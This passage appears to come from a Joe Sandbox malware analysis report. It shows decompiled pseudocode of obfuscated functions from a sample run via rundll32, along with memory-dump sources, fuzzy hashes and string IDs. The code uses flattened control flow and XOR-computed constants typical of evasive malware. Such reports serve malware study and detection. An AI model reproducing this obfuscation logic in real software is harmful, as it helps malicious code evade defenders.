                                                                                                                                  												E002E8519( *(_t321 + 0x4c),  *(_t321 + 0x2c),  *((intOrPtr*)(_t321 + 0x6c)));
                                                                                                                                  												L20:
                                                                                                                                  												_t292 =  *0x2f3e08; // 0x0
                                                                                                                                  											} else {
                                                                                                                                  												if(_t262 != 0xfeff895) {
                                                                                                                                  													L17:
                                                                                                                                  													__eflags = _t262 - 0x20f61b3;
                                                                                                                                  													if(__eflags != 0) {
                                                                                                                                  														L2:
                                                                                                                                  														_t237 =  *(_t321 + 0x60);
                                                                                                                                  														continue;
                                                                                                                                  													}
                                                                                                                                  												} else {
                                                                                                                                  													asm("sbb ecx, ecx");
                                                                                                                                  													_t262 = (_t262 & 0xf84d8315) + 0xd41016e;
                                                                                                                                  													continue;
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							 *(_t292 + 0x14) =  *(_t292 + 0x14) & 0x00000000;
                                                                                                                                  							 *((intOrPtr*)(_t292 + 4)) =  *(_t292 + 0x20);
                                                                                                                                  							__eflags = 1;
                                                                                                                                  							return 1;
                                                                                                                                  						}
                                                                                                                                  						_push( *(_t321 + 0x1c));
                                                                                                                                  						_push( *(_t321 + 0x38));
                                                                                                                                  						 *((char*)(_t321 + 0x1b)) =  *((intOrPtr*)(_t306 + 1));
                                                                                                                                  						 *((char*)(_t321 + 0x1a)) =  *((intOrPtr*)(_t306 + 2));
                                                                                                                                  						E002E1652( *(_t321 + 0x70), __eflags,  *(_t321 + 0x47) & 0x000000ff,  *(_t321 + 0x26) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x68)),  *(_t321 + 0x60), E002EDCF7( *((intOrPtr*)(_t321 + 0x5c)), 0x2d1590, __eflags), 0x10, _t319 + 0x1c,  *(_t321 + 0x70),  *(_t306 + 3) & 0x000000ff,  *((intOrPtr*)(_t321 + 0x34)),  *(_t306 + 3) & 0x000000ff,  *(_t321 + 0x28));
                                                                                                                                  						E002DA8B0( *((intOrPtr*)(_t321 + 0x80)), _t240,  *((intOrPtr*)(_t321 + 0x94)));
                                                                                                                                  						_t321 = _t321 + 0x3c;
                                                                                                                                  						 *(_t319 + 0x1a) = ( *(_t306 + 4) & 0x000000ff) << 0x00000008 |  *(_t306 + 5) & 0x000000ff;
                                                                                                                                  						_t246 =  *((intOrPtr*)(_t306 + 6));
                                                                                                                                  						_t269 =  *((intOrPtr*)(_t306 + 7));
                                                                                                                                  						_t306 = _t306 + 8;
                                                                                                                                  						_t262 = 0x26954f0;
                                                                                                                                  						_t301 = (_t246 & 0x000000ff) << 0x00000008 | _t269 & 0x000000ff;
                                                                                                                                  						__eflags = _t301;
                                                                                                                                  						 *(_t319 + 0x18) = _t301;
                                                                                                                                  						_t292 =  *0x2f3e08; // 0x0
                                                                                                                                  						goto L17;
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  			}





















                                                                                                                                  0x002f13a7
                                                                                                                                  0x002f13ac
                                                                                                                                  0x002f13ac
                                                                                                                                  0x002f12c4
                                                                                                                                  0x002f12ca
                                                                                                                                  0x002f12d5
                                                                                                                                  0x002f12dc
                                                                                                                                  0x002f131e
                                                                                                                                  0x002f1333
                                                                                                                                  0x002f133c
                                                                                                                                  0x002f134a
                                                                                                                                  0x002f134e
                                                                                                                                  0x002f1351
                                                                                                                                  0x002f1354
                                                                                                                                  0x002f1361
                                                                                                                                  0x002f1366
                                                                                                                                  0x002f1366
                                                                                                                                  0x002f1369
                                                                                                                                  0x002f136d
                                                                                                                                  0x00000000
                                                                                                                                  0x002f136d
                                                                                                                                  0x002f11d7

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: 4t$=r;$_O\$mWv$N$Zh
                                                                                                                                  • API String ID: 0-2036408213
                                                                                                                                  • Opcode ID: 1636ccb0ea5072868d28eb7fa1e218e294edb0056bbeab9d79b3352eb81666e3
                                                                                                                                  • Instruction ID: 9353c7b47abb6e9bf2614c6d3b4d83d87717e268ca50faa8cba21a3a78441d06
                                                                                                                                  • Opcode Fuzzy Hash: 1636ccb0ea5072868d28eb7fa1e218e294edb0056bbeab9d79b3352eb81666e3
                                                                                                                                  • Instruction Fuzzy Hash: CAC153715183819FC318CF25C48942BFFE1BBC9358F508A1EF69A96260D3B4D959CF86
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E002ED389(void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28) {
                                                                                                                                  				intOrPtr _v60;
                                                                                                                                  				char _v68;
                                                                                                                                  				char _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				signed int _v108;
                                                                                                                                  				signed int _v112;
                                                                                                                                  				signed int _v116;
                                                                                                                                  				signed int _v120;
                                                                                                                                  				signed int _v124;
                                                                                                                                  				signed int _v128;
                                                                                                                                  				signed int _v132;
                                                                                                                                  				signed int _v136;
                                                                                                                                  				signed int _v140;
                                                                                                                                  				signed int _v144;
                                                                                                                                  				signed int _v148;
                                                                                                                                  				signed int _v152;
                                                                                                                                  				signed int _v156;
                                                                                                                                  				signed int _v160;
                                                                                                                                  				signed int _v164;
                                                                                                                                  				signed int _v168;
                                                                                                                                  				void* __ecx;
                                                                                                                                  				char _t245;
                                                                                                                                  				void* _t263;
                                                                                                                                  				signed int _t272;
                                                                                                                                  				signed int _t273;
                                                                                                                                  				signed int _t274;
                                                                                                                                  				signed int _t275;
                                                                                                                                  				signed int _t276;
                                                                                                                                  				signed int _t277;
                                                                                                                                  				void* _t280;
                                                                                                                                  				void* _t306;
                                                                                                                                  				intOrPtr _t307;
                                                                                                                                  				char _t308;
                                                                                                                                  				signed int* _t311;
                                                                                                                                  
                                                                                                                                  				_push(_a28);
                                                                                                                                  				_t306 = __edx;
                                                                                                                                  				_push(_a24);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(_a16);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_push(0);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_t245 = E002E20B9(0);
                                                                                                                                  				_v72 = _t245;
                                                                                                                                  				_t311 =  &(( &_v168)[9]);
                                                                                                                                  				_v84 = 0xd8cd3;
                                                                                                                                  				_t307 = _t245;
                                                                                                                                  				_v84 = _v84 ^ 0x2f0b54cb;
                                                                                                                                  				_v84 = _v84 ^ 0x2f06dc18;
                                                                                                                                  				_t280 = 0xd3d1227;
                                                                                                                                  				_v116 = 0xdf2f98;
                                                                                                                                  				_v116 = _v116 >> 4;
                                                                                                                                  				_v116 = _v116 | 0xd629951a;
                                                                                                                                  				_v116 = _v116 ^ 0xd62df7db;
                                                                                                                                  				_v120 = 0x9d2532;
                                                                                                                                  				_v120 = _v120 | 0x60368432;
                                                                                                                                  				_v120 = _v120 << 1;
                                                                                                                                  				_v120 = _v120 ^ 0xc1706bd2;
                                                                                                                                  				_v104 = 0x3ed100;
                                                                                                                                  				_v104 = _v104 >> 0xd;
                                                                                                                                  				_v104 = _v104 << 0x10;
                                                                                                                                  				_v104 = _v104 ^ 0x01fb42fe;
                                                                                                                                  				_v132 = 0xac3ff1;
                                                                                                                                  				_v132 = _v132 << 1;
                                                                                                                                  				_v132 = _v132 ^ 0x8b709814;
                                                                                                                                  				_v132 = _v132 + 0xffff5c55;
                                                                                                                                  				_v132 = _v132 ^ 0x8a223f6b;
                                                                                                                                  				_v164 = 0xc1955c;
                                                                                                                                  				_v164 = _v164 + 0xe851;
                                                                                                                                  				_v164 = _v164 >> 5;
                                                                                                                                  				_t272 = 0x7c;
                                                                                                                                  				_v164 = _v164 / _t272;
                                                                                                                                  				_v164 = _v164 ^ 0x000d6983;
                                                                                                                                  				_v76 = 0x371de3;
                                                                                                                                  				_v76 = _v76 >> 1;
                                                                                                                                  				_v76 = _v76 ^ 0x00157680;
                                                                                                                                  				_v156 = 0xc7985;
                                                                                                                                  				_v156 = _v156 + 0xffff997a;
                                                                                                                                  				_v156 = _v156 + 0x5493;
                                                                                                                                  				_v156 = _v156 ^ 0xa8ab967c;
                                                                                                                                  				_v156 = _v156 ^ 0xa8a621f4;
                                                                                                                                  				_v92 = 0xd6ada;
                                                                                                                                  				_v92 = _v92 + 0xf102;
                                                                                                                                  				_v92 = _v92 ^ 0x00049005;
                                                                                                                                  				_v152 = 0xbb1df2;
                                                                                                                                  				_t273 = 0x71;
                                                                                                                                  				_v152 = _v152 * 0x37;
                                                                                                                                  				_v152 = _v152 << 2;
                                                                                                                                  				_v152 = _v152 + 0x7572;
                                                                                                                                  				_v152 = _v152 ^ 0xa0c338c0;
                                                                                                                                  				_v108 = 0xfb68a6;
                                                                                                                                  				_v108 = _v108 / _t273;
                                                                                                                                  				_v108 = _v108 * 0x38;
                                                                                                                                  				_v108 = _v108 ^ 0x00745d8a;
                                                                                                                                  				_v160 = 0x9cfb41;
                                                                                                                                  				_v160 = _v160 >> 0xd;
                                                                                                                                  				_v160 = _v160 + 0xffff2425;
                                                                                                                                  				_v160 = _v160 | 0xc56bf860;
                                                                                                                                  				_v160 = _v160 ^ 0xffffb927;
                                                                                                                                  				_v100 = 0xcc3697;
                                                                                                                                  				_v100 = _v100 << 9;
                                                                                                                                  				_t274 = 0x3d;
                                                                                                                                  				_v100 = _v100 / _t274;
                                                                                                                                  				_v100 = _v100 ^ 0x027f162e;
                                                                                                                                  				_v124 = 0x5e8102;
                                                                                                                                  				_v124 = _v124 << 1;
                                                                                                                                  				_v124 = _v124 >> 4;
                                                                                                                                  				_v124 = _v124 ^ 0x000928e5;
                                                                                                                                  				_v96 = 0x9a5083;
                                                                                                                                  				_v96 = _v96 + 0xffff88fb;
                                                                                                                                  				_v96 = _v96 | 0x7e2ee754;
                                                                                                                                  				_v96 = _v96 ^ 0x7eb15945;
                                                                                                                                  				_v168 = 0x417f4c;
                                                                                                                                  				_v168 = _v168 + 0x30ef;
                                                                                                                                  				_v168 = _v168 + 0xffff0fcf;
                                                                                                                                  				_v168 = _v168 | 0x766f950c;
                                                                                                                                  				_v168 = _v168 ^ 0x7667a907;
                                                                                                                                  				_v148 = 0xeb5ea2;
                                                                                                                                  				_v148 = _v148 >> 1;
                                                                                                                                  				_v148 = _v148 | 0xdbfe62fd;
                                                                                                                                  				_v148 = _v148 ^ 0xdbf81284;
                                                                                                                                  				_v88 = 0xc982d2;
                                                                                                                                  				_v88 = _v88 | 0xbf502ba4;
                                                                                                                                  				_v88 = _v88 ^ 0xbfda3d08;
                                                                                                                                  				_v80 = 0x51a7e7;
                                                                                                                                  				_v80 = _v80 | 0xcf4b4eb1;
                                                                                                                                  				_v80 = _v80 ^ 0xcf5d8599;
                                                                                                                                  				_v140 = 0x112038;
                                                                                                                                  				_v140 = _v140 >> 0xc;
                                                                                                                                  				_v140 = _v140 | 0x79e3f6d0;
                                                                                                                                  				_v140 = _v140 >> 0xc;
                                                                                                                                  				_v140 = _v140 ^ 0x000d6368;
                                                                                                                                  				_v144 = 0x3c4be1;
                                                                                                                                  				_v144 = _v144 << 1;
                                                                                                                                  				_t275 = 0x51;
                                                                                                                                  				_v144 = _v144 / _t275;
                                                                                                                                  				_t276 = 0x44;
                                                                                                                                  				_v144 = _v144 / _t276;
                                                                                                                                  				_v144 = _v144 ^ 0x0006a926;
                                                                                                                                  				_v112 = 0xebe610;
                                                                                                                                  				_t277 = 6;
                                                                                                                                  				_v112 = _v112 / _t277;
                                                                                                                                  				_v112 = _v112 ^ 0x8e2a0175;
                                                                                                                                  				_v112 = _v112 ^ 0x8e0783c0;
                                                                                                                                  				_v128 = 0x507b99;
                                                                                                                                  				_v128 = _v128 ^ 0xb6dd86a4;
                                                                                                                                  				_v128 = _v128 + 0xffff6e9b;
                                                                                                                                  				_v128 = _v128 * 0x6f;
                                                                                                                                  				_v128 = _v128 ^ 0x275b8ca8;
                                                                                                                                  				_v136 = 0x1b49e9;
                                                                                                                                  				_v136 = _v136 * 0x22;
                                                                                                                                  				_v136 = _v136 ^ 0x6bc19a50;
                                                                                                                                  				_v136 = _v136 ^ 0xda04c504;
                                                                                                                                  				_v136 = _v136 ^ 0xb25c1cc6;
                                                                                                                                  				do {
                                                                                                                                  					while(_t280 != 0x9b6c7ef) {
                                                                                                                                  						if(_t280 == 0xd3d1227) {
                                                                                                                                  							_t280 = 0x9b6c7ef;
                                                                                                                                  							continue;
                                                                                                                                  						} else {
                                                                                                                                  							if(_t280 == 0xd8aa277) {
                                                                                                                                  								E002E9008(_v72, _v128, _v136);
                                                                                                                                  							} else {
                                                                                                                                  								_t317 = _t280 - 0xdb35d55;
                                                                                                                                  								if(_t280 != 0xdb35d55) {
                                                                                                                                  									goto L10;
                                                                                                                                  								} else {
                                                                                                                                  									_push(_v164);
                                                                                                                                  									_push(_v132);
                                                                                                                                  									_t308 = 0x44;
                                                                                                                                  									E002D4B61( &_v68, _t308);
                                                                                                                                  									_push(_v92);
                                                                                                                                  									_v68 = _t308;
                                                                                                                                  									_push(_v156);
                                                                                                                                  									_t284 = _v76;
                                                                                                                                  									_v60 = E002EDCF7(_v76, 0x2d173c, _t317);
                                                                                                                                  									_t307 = E002EDE10( &_v68, _v152, _t306, _v116 | _v84, _v76, _a12, _v108, 0, _a28, _v160, _v72, _v100, _v124, _v96, _t284, _t284, _v168, _v148, _t284, _v88, _v80, _v140);
                                                                                                                                  									E002DA8B0(_v144, _v60, _v112);
                                                                                                                                  									_t311 =  &(_t311[0x19]);
                                                                                                                                  									_t280 = 0xd8aa277;
                                                                                                                                  									continue;
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						L13:
                                                                                                                                  						return _t307;
                                                                                                                                  					}
                                                                                                                                  					_t263 = E002D4241(_t280, _v120,  &_v72, _a28, _v104);
                                                                                                                                  					_t311 =  &(_t311[3]);
                                                                                                                                  					__eflags = _t263;
                                                                                                                                  					if(_t263 == 0) {
                                                                                                                                  						_t280 = 0xcb447d9;
                                                                                                                                  						goto L10;
                                                                                                                                  					} else {
                                                                                                                                  						_t280 = 0xdb35d55;
                                                                                                                                  						continue;
                                                                                                                                  					}
                                                                                                                                  					goto L13;
                                                                                                                                  					L10:
                                                                                                                                  					__eflags = _t280 - 0xcb447d9;
                                                                                                                                  				} while (_t280 != 0xcb447d9);
                                                                                                                                  				goto L13;
                                                                                                                                  			}













































                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: T.~$hc$ru$($0$K<
                                                                                                                                  • API String ID: 0-2343433060
                                                                                                                                  • Opcode ID: 1b4b13cabd92a24fdc23501e4117e7220d11670ab697f6225a926fef48805aa2
                                                                                                                                  • Instruction ID: 090bc33d6caa1044b29ceab58a93fcec95b1a6b20035aa6fc2bbb02c19a48cbb
                                                                                                                                  • Opcode Fuzzy Hash: 1b4b13cabd92a24fdc23501e4117e7220d11670ab697f6225a926fef48805aa2
                                                                                                                                  • Instruction Fuzzy Hash: 2EC122725183809FD768CF21C98AA5BFBE1FBD5704F504A1DF29A96260C7B28958CF43
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 97%
                                                                                                                                  			E002D3E3F() {
                                                                                                                                  				signed int _v4;
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				void* _t213;
                                                                                                                                  				signed int _t214;
                                                                                                                                  				void* _t216;
                                                                                                                                  				signed int _t222;
                                                                                                                                  				intOrPtr _t223;
                                                                                                                                  				signed int _t224;
                                                                                                                                  				signed int _t225;
                                                                                                                                  				signed int _t226;
                                                                                                                                  				signed int _t227;
                                                                                                                                  				signed int _t228;
                                                                                                                                  				signed int _t229;
                                                                                                                                  				void* _t230;
                                                                                                                                  				void* _t236;
                                                                                                                                  				void* _t257;
                                                                                                                                  				signed int* _t261;
                                                                                                                                  
                                                                                                                                  				_t261 =  &_v100;
                                                                                                                                  				_v8 = 0xc74bd8;
                                                                                                                                  				_v4 = 0;
                                                                                                                                  				_v72 = 0x3d4417;
                                                                                                                                  				_v72 = _v72 << 8;
                                                                                                                                  				_v72 = _v72 + 0xffff33fd;
                                                                                                                                  				_v72 = _v72 ^ 0xbd434afc;
                                                                                                                                  				_v32 = 0xa9ac19;
                                                                                                                                  				_v32 = _v32 + 0x4aca;
                                                                                                                                  				_v32 = _v32 ^ 0x00a9f6e1;
                                                                                                                                  				_v40 = 0x1f6a8;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				_v40 = _v40 * 0x6f;
                                                                                                                                  				_t257 = 0xf52a3f4;
                                                                                                                                  				_v40 = _v40 ^ 0x00d19880;
                                                                                                                                  				_v44 = 0x168b17;
                                                                                                                                  				_v44 = _v44 + 0x13a5;
                                                                                                                                  				_v44 = _v44 ^ 0x001ee95f;
                                                                                                                                  				_v48 = 0xfac2ed;
                                                                                                                                  				_v48 = _v48 + 0xffff2a35;
                                                                                                                                  				_v48 = _v48 ^ 0x00fbd9f9;
                                                                                                                                  				_v92 = 0xc00c53;
                                                                                                                                  				_v92 = _v92 + 0xffff1aa9;
                                                                                                                                  				_v92 = _v92 + 0xf2d7;
                                                                                                                                  				_t225 = 0x68;
                                                                                                                                  				_v92 = _v92 / _t225;
                                                                                                                                  				_v92 = _v92 ^ 0x0000565c;
                                                                                                                                  				_v68 = 0xf2ac97;
                                                                                                                                  				_v68 = _v68 ^ 0x99fc0549;
                                                                                                                                  				_v68 = _v68 >> 0xf;
                                                                                                                                  				_v68 = _v68 ^ 0x000a8804;
                                                                                                                                  				_v24 = 0xf89d13;
                                                                                                                                  				_t226 = 0x49;
                                                                                                                                  				_v24 = _v24 / _t226;
                                                                                                                                  				_v24 = _v24 ^ 0x000ed122;
                                                                                                                                  				_v96 = 0x9976f7;
                                                                                                                                  				_v96 = _v96 >> 0xe;
                                                                                                                                  				_v96 = _v96 ^ 0xdd1af6ea;
                                                                                                                                  				_v96 = _v96 ^ 0x684d855d;
                                                                                                                                  				_v96 = _v96 ^ 0xb5551d4c;
                                                                                                                                  				_v28 = 0x12a2d6;
                                                                                                                                  				_t227 = 0xe;
                                                                                                                                  				_v28 = _v28 * 0x29;
                                                                                                                                  				_v28 = _v28 ^ 0x02ffade5;
                                                                                                                                  				_v100 = 0x1d8880;
                                                                                                                                  				_v100 = _v100 + 0x8a1e;
                                                                                                                                  				_v100 = _v100 * 0x7c;
                                                                                                                                  				_v100 = _v100 + 0xffff421a;
                                                                                                                                  				_v100 = _v100 ^ 0x0e9f1559;
                                                                                                                                  				_v36 = 0x784079;
                                                                                                                                  				_v36 = _v36 / _t227;
                                                                                                                                  				_v36 = _v36 ^ 0x0007caf6;
                                                                                                                                  				_v60 = 0xd037f8;
                                                                                                                                  				_v60 = _v60 >> 0xf;
                                                                                                                                  				_v60 = _v60 + 0xfffff3b4;
                                                                                                                                  				_v60 = _v60 ^ 0xfff3df4e;
                                                                                                                                  				_v64 = 0x95f516;
                                                                                                                                  				_v64 = _v64 + 0xffffc55a;
                                                                                                                                  				_v64 = _v64 | 0x523f0ae6;
                                                                                                                                  				_v64 = _v64 ^ 0x52b19695;
                                                                                                                                  				_v84 = 0x271827;
                                                                                                                                  				_v84 = _v84 + 0xffff7017;
                                                                                                                                  				_v84 = _v84 + 0x1e15;
                                                                                                                                  				_v84 = _v84 ^ 0xa1c53b6b;
                                                                                                                                  				_v84 = _v84 ^ 0xa1e64a9e;
                                                                                                                                  				_v52 = 0x3d5883;
                                                                                                                                  				_v52 = _v52 >> 5;
                                                                                                                                  				_v52 = _v52 << 3;
                                                                                                                                  				_v52 = _v52 ^ 0x000b56f4;
                                                                                                                                  				_v56 = 0xd5acf2;
                                                                                                                                  				_v56 = _v56 ^ 0x15c9a5cd;
                                                                                                                                  				_v56 = _v56 << 3;
                                                                                                                                  				_v56 = _v56 ^ 0xa8e6808a;
                                                                                                                                  				_v88 = 0xcc2476;
                                                                                                                                  				_v88 = _v88 + 0x4ceb;
                                                                                                                                  				_v88 = _v88 ^ 0xdbab884b;
                                                                                                                                  				_t228 = 0x4f;
                                                                                                                                  				_v88 = _v88 / _t228;
                                                                                                                                  				_v88 = _v88 ^ 0x02ce2d39;
                                                                                                                                  				_v20 = 0x9b21e;
                                                                                                                                  				_v20 = _v20 + 0x218b;
                                                                                                                                  				_v20 = _v20 ^ 0x00037084;
                                                                                                                                  				_v76 = 0xcba48;
                                                                                                                                  				_t229 = 0x5a;
                                                                                                                                  				_t222 = _v12;
                                                                                                                                  				_v76 = _v76 * 0x7b;
                                                                                                                                  				_v76 = _v76 + 0x3acc;
                                                                                                                                  				_v76 = _v76 << 0x10;
                                                                                                                                  				_v76 = _v76 ^ 0xbb6cb0a9;
                                                                                                                                  				_v80 = 0x9c886e;
                                                                                                                                  				_v80 = _v80 ^ 0x88757b42;
                                                                                                                                  				_t230 = 0x5c;
                                                                                                                                  				_v80 = _v80 / _t229;
                                                                                                                                  				_v80 = _v80 << 0xe;
                                                                                                                                  				_v80 = _v80 ^ 0x5c6ae118;
                                                                                                                                  				while(1) {
                                                                                                                                  					L1:
                                                                                                                                  					_t213 = 0xa360d2e;
                                                                                                                                  					do {
                                                                                                                                  						while(_t257 != _t213) {
                                                                                                                                  							if(_t257 == 0xb87cfc3) {
                                                                                                                                  								_t223 =  *0x2f3e10; // 0x0
                                                                                                                                  								_t224 = _t223 + 0x1c;
                                                                                                                                  								while(1) {
                                                                                                                                  									__eflags =  *_t224 - _t230;
                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                  										break;
                                                                                                                                  									}
                                                                                                                                  									_t224 = _t224 + 2;
                                                                                                                                  									__eflags = _t224;
                                                                                                                                  								}
                                                                                                                                  								_t222 = _t224 + 2;
                                                                                                                                  								_t257 = 0xc7301de;
                                                                                                                                  								goto L1;
                                                                                                                                  							} else {
                                                                                                                                  								if(_t257 == 0xc7301de) {
                                                                                                                                  									_push(_v48);
                                                                                                                                  									_push(_v44);
                                                                                                                                  									_t216 = E002EDCF7(_v40, 0x2d1080, __eflags);
                                                                                                                                  									_pop(_t236);
                                                                                                                                  									__eflags = E002DAAD6(_t216, _v92, _v68, _v72, _t236, _t236, _v24, _v96, _v28, _t236,  &_v16, _v100, _t236, _v32, _t236, _v36);
                                                                                                                                  									_t257 =  ==  ? 0xa360d2e : 0x57f878b;
                                                                                                                                  									E002DA8B0(_v60, _t216, _v64);
                                                                                                                                  									_t261 =  &(_t261[0xf]);
                                                                                                                                  									L14:
                                                                                                                                  									_t213 = 0xa360d2e;
                                                                                                                                  									_t230 = 0x5c;
                                                                                                                                  									goto L15;
                                                                                                                                  								} else {
                                                                                                                                  									if(_t257 == 0xdd28c3f) {
                                                                                                                                  										E002D1FD1(_v20, _v76, _v80, _v16);
                                                                                                                                  									} else {
                                                                                                                                  										if(_t257 != 0xf52a3f4) {
                                                                                                                                  											goto L15;
                                                                                                                                  										} else {
                                                                                                                                  											_t257 = 0xb87cfc3;
                                                                                                                                  											continue;
                                                                                                                                  										}
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							L18:
                                                                                                                                  							return _v12;
                                                                                                                                  						}
                                                                                                                                  						_t214 = E002D1F53(_v16, _v84, _v52, _t222, _v56, _v88);
                                                                                                                                  						_t261 =  &(_t261[4]);
                                                                                                                                  						__eflags = _t214;
                                                                                                                                  						_t257 = 0xdd28c3f;
                                                                                                                                  						_t191 = _t214 == 0;
                                                                                                                                  						__eflags = _t191;
                                                                                                                                  						_v12 = 0 | _t191;
                                                                                                                                  						goto L14;
                                                                                                                                  						L15:
                                                                                                                                  						__eflags = _t257 - 0x57f878b;
                                                                                                                                  					} while (__eflags != 0);
                                                                                                                                  					goto L18;
                                                                                                                                  				}
                                                                                                                                  			}












































                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: .6$.6$.6$y@x$?R$L
                                                                                                                                  • API String ID: 0-3177096336
                                                                                                                                  • Opcode ID: f26b41d25f4dbc6d6fd0d0a13f33cfe8e76d06b12b3ea5db1aa2d6c30807d58a
                                                                                                                                  • Instruction ID: e21b1538bf14c4cae1f5f26ceab99756c57ffe267b54efcaed05e8dc0bb4d417
                                                                                                                                  • Opcode Fuzzy Hash: f26b41d25f4dbc6d6fd0d0a13f33cfe8e76d06b12b3ea5db1aa2d6c30807d58a
                                                                                                                                  • Instruction Fuzzy Hash: A5A14FB25083819FD798CF26C88A41BBBE1FBD4758F108A1EF19986260D3B1C959CF46
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 96%
                                                                                                                                  			E002DB74D(void* __ecx, void* __edx) {
                                                                                                                                  				signed int _v4;
                                                                                                                                  				intOrPtr _v8;
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				signed int _v48;
                                                                                                                                  				signed int _v52;
                                                                                                                                  				signed int _v56;
                                                                                                                                  				signed int _v60;
                                                                                                                                  				signed int _v64;
                                                                                                                                  				signed int _v68;
                                                                                                                                  				signed int _v72;
                                                                                                                                  				signed int _v76;
                                                                                                                                  				signed int _v80;
                                                                                                                                  				signed int _v84;
                                                                                                                                  				signed int _v88;
                                                                                                                                  				signed int _v92;
                                                                                                                                  				signed int _v96;
                                                                                                                                  				signed int _v100;
                                                                                                                                  				signed int _v104;
                                                                                                                                  				void* _t231;
                                                                                                                                  				intOrPtr _t232;
                                                                                                                                  				intOrPtr _t233;
                                                                                                                                  				void* _t237;
                                                                                                                                  				signed int _t239;
                                                                                                                                  				signed int _t240;
                                                                                                                                  				signed int _t241;
                                                                                                                                  				signed int _t242;
                                                                                                                                  				void* _t266;
                                                                                                                                  				void* _t267;
                                                                                                                                  				signed int* _t270;
                                                                                                                                  				signed int* _t271;
                                                                                                                                  
                                                                                                                                  				_t270 =  &_v104;
                                                                                                                                  				_v4 = _v4 & 0x00000000;
                                                                                                                                  				_v12 = 0x6c2b32;
                                                                                                                                  				_v8 = 0x58b11;
                                                                                                                                  				_v64 = 0x37f8ee;
                                                                                                                                  				_v64 = _v64 + 0xffff6702;
                                                                                                                                  				_v64 = _v64 ^ 0xad40df3f;
                                                                                                                                  				_v64 = _v64 ^ 0xad79282c;
                                                                                                                                  				_v100 = 0x6d524;
                                                                                                                                  				_v100 = _v100 >> 0xf;
                                                                                                                                  				_v100 = _v100 + 0x2921;
                                                                                                                                  				_v100 = _v100 >> 6;
                                                                                                                                  				_v100 = _v100 ^ 0x00050ee9;
                                                                                                                                  				_v28 = 0x9e9a;
